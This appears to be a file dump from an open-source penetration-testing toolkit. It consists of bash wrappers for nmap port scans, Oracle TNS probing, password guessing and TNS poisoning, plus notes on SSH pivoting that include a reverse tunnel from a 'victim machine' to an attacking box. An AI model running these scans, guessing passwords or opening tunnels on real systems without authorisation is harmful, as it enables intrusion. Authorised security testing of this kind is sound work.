14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | 
25 | if [ $# -eq 1 ]; then
26 |   nmap -oX - -sT --top-ports $1 2>/dev/null | grep 'services=' | sed 's/<scaninfo type="connect" protocol="tcp" numservices="[[:digit:]]\+" services="//g' | sed 's|"/>||g'
27 | else
28 |   echo "Please provide number of ports."
29 | fi
30 | 


--------------------------------------------------------------------------------
/misc/print-top-udp-ports.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2018 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | 
25 | if [[ $EUID -ne 0 ]]; then
26 |   echo "Please run this script as root." 1>&2
27 |   exit 1
28 | fi
29 | 
30 | if [ $# -eq 1 ]; then
31 |   nmap -oX - -sU --top-ports $1 2>/dev/null | grep 'services=' | sed 's/<scaninfo type="udp" protocol="udp" numservices="[[:digit:]]\+" services="//g' | sed 's|"/>||g'
32 | else
33 |   echo "Please provide number of ports."
34 | fi
35 | 


--------------------------------------------------------------------------------
/misc/responds-to-ping.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2018 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | 
25 | 
26 | if [ $# -eq 1 ]; then
27 | 	response=$(ping -c 1 $1 | grep 'received' | cut -d, -f2 | sed 's/received//' | sed 's/ //')
28 | 	if [ "$response" -eq "1" ]; then
29 | 		echo "$1    YES"
30 | 	else
31 | 		echo "$1    NO"
32 | 	fi
33 | else
34 | 	echo "Please provide an IP address."
35 | fi
36 | 


--------------------------------------------------------------------------------
/misc/ssh.md:
--------------------------------------------------------------------------------
 1 | ## SSH Tunnels
 2 | 
 3 | ### Reverse SSH Tunnel
 4 | 
 5 | *From the victim machine to our attacking box.*
 6 | 
 7 | ```bash
 8 | plink -l root -pw <mypassword> <attacking.machine.ip.address> -R 3390:127.0.0.1:3389
 9 | ```
10 | 
11 | ### SSH Local Port Forwarding
12 | 
13 | ```bash
14 | ssh -L 0.0.0.0:4444:<attacking.machine.ip.address>:4444 <local_hostname>
15 | ```
16 | 
17 | ```bash
18 | ssh -L 10443:<victim.ip.address>:443 user@<pivot_host>
19 | ```
20 | 
21 | ```bash
22 | ssh -L 0.0.0.0:45001:<victim.ip.address>:80 user@<pivot_host>
23 | ```
24 | 
25 | ### SSH Dynamic Port Forwarding
26 | 
27 | * Set a local listening port and have it tunnel incoming traffic to any remote destination through a socks proxy.
28 | * SSH to create a socks4 proxy on our local attacking box and tunnel all incoming traffic to that port through DMZ network of our victim.
29 | * Forward/Tunnel and redirect our traffic to the victim's machine.
30 | 
31 | ```bash
32 | ssh -f -N -D 9050 root@victim.example.com
33 | ```
34 | 
35 | * proxychains
36 | 
37 | ```bash
38 | nano /etc/proxychains.conf
39 | ```
40 | 
41 | * Content
42 | 
43 | ```bash
44 | [ProxyList]
45 | #...
46 | socks4 127.0.0.1 9050
47 | ```
48 | 
49 | * Run e.g. nmap
50 | 
51 | ```bash
52 | proxychains nmap -p 80 -sT -Pn x.x.x.0/24 --open
53 | ```
54 | 


--------------------------------------------------------------------------------
/nessus/extract-info-nessus.md:
--------------------------------------------------------------------------------
 1 | ## Nessus Information
 2 | 
 3 | * Export Scan results as a csv file.
 4 | 
 5 | ### Export Critical Vulnerabilities
 6 | 
 7 | ```bash
 8 | cat myproject.csv | grep '"Critical"' | sed 's/"//g' | awk -F',' '{print $5,$6,$7,$8}' | sort
 9 | ```
10 | 
11 | ### Export High Vulnerabilities
12 | 
13 | ```bash
14 | cat myproject.csv | grep '"High"' | sed 's/"//g' | awk -F',' '{print $5,$6,$7,$8}' | sort
15 | ```
16 | 
17 | ### Export Medium Vulnerabilities
18 | 
19 | ```bash
20 | cat myproject.csv | grep '"Medium"' | sed 's/"//g' | awk -F',' '{print $5,$6,$7,$8}' | sort
21 | ```
22 | 
23 | ### Export Low Vulnerabilities
24 | 
25 | ```bash
26 | cat myproject.csv | grep '"Low"' | sed 's/"//g' | awk -F',' '{print $5,$6,$7,$8}' | sort
27 | ```
28 | 
29 | 


--------------------------------------------------------------------------------
/oracle/odat-passwordguesser.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2020 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | 
25 | if [ $# -eq 2 ]; then
26 |     python3 odat.py passwordguesser -s $1 -p $2 -d $3 --accounts-file accounts/accounts_multiple.txt
27 | else
28 |     echo "Please provide the target host and port."
29 | fi
30 | 


--------------------------------------------------------------------------------
/oracle/odat-ping.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2020 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | 
25 | if [ $# -eq 2 ]; then
26 |     python3 odat.py tnscmd -s $1 -p $2 --ping
27 | else
28 |     echo "Please provide the target host and port."
29 | fi
30 | 


--------------------------------------------------------------------------------
/oracle/odat-sidguesser.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2020 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | 
25 | if [ $# -eq 2 ]; then
26 |     python3 odat.py sidguesser -s $1 -p $2
27 | else
28 |     echo "Please provide the target host and port."
29 | fi
30 | 


--------------------------------------------------------------------------------
/oracle/odat-status.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2020 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | 
25 | if [ $# -eq 2 ]; then
26 |     python3 odat.py tnscmd -s $1 -p $2 --status
27 | else
28 |     echo "Please provide the target host and port."
29 | fi
30 | 


--------------------------------------------------------------------------------
/oracle/odat-tnspoison.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2020 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | 
25 | if [ $# -eq 2 ]; then
26 |     python3 odat.py tnspoison -s $1 -p $2 -d $3 --test-module
27 | else
28 |     echo "Please provide the target host and port."
29 | fi
30 | 


--------------------------------------------------------------------------------
/oracle/odat-version.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2020 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | 
25 | if [ $# -eq 2 ]; then
26 |     python3 odat.py tnscmd -s $1 -p $2 --version
27 | else
28 |     echo "Please provide the target host and port."
29 | fi
30 | 


--------------------------------------------------------------------------------
/oracle/oracle-tnscmd-ping.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2020 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | 
25 | if [ $# -eq 2 ]; then
26 |     tnscmd10g ping -h $1 -p $2 2>&1 | tee "oracle_tnscmd_ping_$1_$2.txt"
27 | else
28 |     echo "Please provide the target host and port."
29 | fi
30 | 


--------------------------------------------------------------------------------
/oracle/oracle-tnscmd-version.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2020 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | 
25 | if [ $# -eq 2 ]; then
26 |     tnscmd10g version -h $1 -p $2 2>&1 | tee "oracle_tnscmd_version_$1_$2.txt"
27 | else
28 |     echo "Please provide the target host and port."
29 | fi
30 | 


--------------------------------------------------------------------------------
/oracle/scanner.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2020 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | 
25 | if [ $# -eq 2 ]; then
26 |     oscanner -v -s $1 -P $2 2>&1 | tee "oracle_scanner_$1_$2.txt"
27 | else
28 |     echo "Please provide the target host and port."
29 | fi
30 | 


--------------------------------------------------------------------------------
/phishing/dnstwist.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2024 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | 
25 | if [ $# -eq 1 ]; then
26 |   dnstwist $1
27 | else
28 |     echo "Please provide the target Domain name."
29 | fi
30 | 


--------------------------------------------------------------------------------
/port-scanning/tcp/full/tcp-ports-scan-full-delay-nc.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2018 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | if [ $# -eq 2 ]; then
25 |     nc -w $2 -z -v $1 1-65535
26 | else
27 |     echo "Please provide the target IP address or an IP range and the scan delay time(seconds)."
28 | fi
29 | 


--------------------------------------------------------------------------------
/port-scanning/tcp/full/tcp-ports-scan-full-delay-sequential-fulltcpcon.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2018 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | if [ $# -eq 2 ]; then
25 |     nmap -sT -vv -r -p- --reason --open --scan-delay $2 -oA tcp_ports_full_delay_sequential_$1 $1
26 | else
27 |     echo "Please provide the target IP address or an IP range and the scan delay time(seconds)."
28 | fi
29 | 


--------------------------------------------------------------------------------
/port-scanning/tcp/full/tcp-ports-scan-full-delay-sequential-noping-fulltcpcon.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2018 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | if [ $# -eq 2 ]; then
25 |     nmap -sT -vv -r -p- --reason -Pn --open --scan-delay $2 -oA tcp_ports_full_delay_sequential_$1 $1
26 | else
27 |     echo "Please provide the target IP address or an IP range and the scan delay time(seconds)."
28 | fi
29 | 


--------------------------------------------------------------------------------
/port-scanning/tcp/full/tcp-ports-scan-full-delay-sequential-noping.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2018 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | if [[ $EUID -ne 0 ]]; then
25 |   echo "Please run this script as root." 1>&2
26 |   exit 1
27 | fi
28 | 
29 | if [ $# -eq 2 ]; then
30 |     nmap -sS -vv -r -p- --reason -Pn --open --scan-delay $2 -oA tcp_ports_full_delay_sequential_$1 $1
31 | else
32 |     echo "Please provide the target IP address or an IP range and the scan delay time(seconds)."
33 | fi
34 | 


--------------------------------------------------------------------------------
/port-scanning/tcp/full/tcp-ports-scan-full-delay-sequential.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2018 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | if [[ $EUID -ne 0 ]]; then
25 |   echo "Please run this script as root." 1>&2
26 |   exit 1
27 | fi
28 | 
29 | if [ $# -eq 2 ]; then
30 |     nmap -sS -vv -r -p- --reason --open --scan-delay $2 -oA tcp_ports_full_delay_sequential_$1 $1
31 | else
32 |     echo "Please provide the target IP address or an IP range and the scan delay time(seconds)."
33 | fi
34 | 


--------------------------------------------------------------------------------
/port-scanning/tcp/full/tcp-ports-scan-full-fast-noping-nodns.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2018 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | if [[ $EUID -ne 0 ]]; then
25 |   echo "Please run this script as root." 1>&2
26 |   exit 1
27 | fi
28 | 
29 | if [ $# -eq 1 ]; then
30 |     nmap -sS -n -Pn -vv -p- --reason --open -T4 -oA tcp_ports_full_$1 $1
31 | else
32 |     echo "Please provide the target IP address or an IP range."
33 | fi
34 | 


--------------------------------------------------------------------------------
/port-scanning/tcp/full/tcp-ports-scan-full-maxrate-noping.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2018 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | if [[ $EUID -ne 0 ]]; then
25 |   echo "Please run this script as root." 1>&2
26 |   exit 1
27 | fi
28 | 
29 | if [ $# -eq 2 ]; then
30 | 	nmap -sS -vv -p- -Pn --reason --open --max-rate $2 -oA tcp_ports_full_maxrate_$1 $1
31 | else
32 |     echo "Please provide the target IP address or an IP range and the max rate."
33 | fi
34 | 


--------------------------------------------------------------------------------
/port-scanning/tcp/full/tcp-ports-scan-full-maxrate.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2018 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | if [[ $EUID -ne 0 ]]; then
25 |   echo "Please run this script as root." 1>&2
26 |   exit 1
27 | fi
28 | 
29 | if [ $# -eq 2 ]; then
30 | 	nmap -sS -vv -p- --reason --open --max-rate $2 -oA tcp_ports_full_maxrate_$1 $1
31 | else
32 |     echo "Please provide the target IP address or an IP range and the max rate."
33 | fi
34 | 


--------------------------------------------------------------------------------
/port-scanning/tcp/full/tcp-ports-scan-full-nodns.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2018 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | if [[ $EUID -ne 0 ]]; then
25 |   echo "Please run this script as root." 1>&2
26 |   exit 1
27 | fi
28 | 
29 | if [ $# -eq 1 ]; then
30 |     nmap -sS -n -vv -p- --reason --open -oA tcp_ports_full_$1 $1
31 | else
32 |     echo "Please provide the target IP address or an IP range."
33 | fi
34 | 


--------------------------------------------------------------------------------
/port-scanning/tcp/full/tcp-ports-scan-full-noping-nodns.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2018 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
